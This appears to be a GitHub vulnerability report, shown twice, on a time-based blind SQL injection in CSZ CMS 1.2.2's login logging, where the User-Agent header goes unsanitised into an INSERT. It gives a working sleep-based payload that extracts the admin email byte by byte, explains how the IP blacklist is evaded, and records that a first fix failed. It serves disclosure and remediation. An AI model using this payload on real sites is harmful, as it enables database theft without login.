Title: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2 Discovered by: @satuer from ABT Labs Security: high (dump database) Software: https://github.com/cskaza/cszcms/archive/1.2.2.zip
Description:
There is a high-risk time-based SQL injection vulnerability on the frontend login page(http://website/cszcms-1.2.2/member/login/check). Exploit this vulnerability could dump the whole database without login.
When login in the frontend login page, if the csrf_csz parameter is removed or padded any string, a log will be recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly without any check when inserting the recorded. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited.
files: cszcms/core/MY_Security.php
login page:
login_logs:
If remove the csrf_csz paramete and login again, a 'CSRF Protection Invalid' log will be recorded.
login_logs:
Exploit:
constructe a HTTP_USER_AGENT, remove the csrf_csz parameter:
User-Agent: '-( if( condition, sleep(5), 1) )-'', '192.168.1.11','time') #
If the condition is true, the page will return after 5 seconds, otherwise it will return immediately.
When UA is '-(if((substr((select email from user_admin limit 1), 1, 1)='1'),sleep(5),1))-'', '192.168.1.11','time') #
The sql string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', ''-(if((substr((select email from user_admin limit 1),1,1)='1'),sleep(5),1))-'', '192.168.1.11','time') #', '192.168.62.1', '2019-06-19 21:17:34.000000')
The insert statement does not actually execute because the last column is not in the correct time format. But the sub select statement will execute, and the sleep will execute if condition is true.
So, the records in the login_logs table will not increase. The IP will not be added to the blacklist and condition($count < 10 in line 45) is always true. Then you can dump whole database one by one byte.
Suggest:
Check UA before inserting UA into sql statement
The text was updated successfully, but these errors were encountered:
I replaced the old files with the new files and tried again, but unfortunately the problem still exists. And I checked your changes, I think using the xss_clean function couldn't solve the sql injection problem
Title: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2
Discovered by: @satuer from ABT Labs
Security: high (dump database)
Software: https://github.com/cskaza/cszcms/archive/1.2.2.zip
Description:
There is a high-risk time-based SQL injection vulnerability on the frontend login page(http://website/cszcms-1.2.2/member/login/check). Exploit this vulnerability could dump the whole database without login.
When login in the frontend login page, if the csrf_csz parameter is removed or padded any string, a log will be recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly without any check when inserting the recorded. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited.
files: cszcms/core/MY_Security.php

login page:

login_logs:

If remove the csrf_csz paramete and login again, a 'CSRF Protection Invalid' log will be recorded.

login_logs:
Exploit:

constructe a HTTP_USER_AGENT, remove the csrf_csz parameter:
User-Agent: '-( if( condition, sleep(5), 1) )-'', '192.168.1.11','time') #
If the condition is true, the page will return after 5 seconds, otherwise it will return immediately.
When UA is '-(if((substr((select email from user_admin limit 1), 1, 1)='1'),sleep(5),1))-'', '192.168.1.11','time') #
The sql string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', ''-(if((substr((select email from user_admin limit 1),1,1)='1'),sleep(5),1))-'', '192.168.1.11','time') #', '192.168.62.1', '2019-06-19 21:17:34.000000')
The insert statement does not actually execute because the last column is not in the correct time format. But the sub select statement will execute, and the sleep will execute if condition is true.

So, the records in the login_logs table will not increase. The IP will not be added to the blacklist and condition($count < 10 in line 45) is always true. Then you can dump whole database one by one byte.
Suggest:
Check UA before inserting UA into sql statement
The text was updated successfully, but these errors were encountered: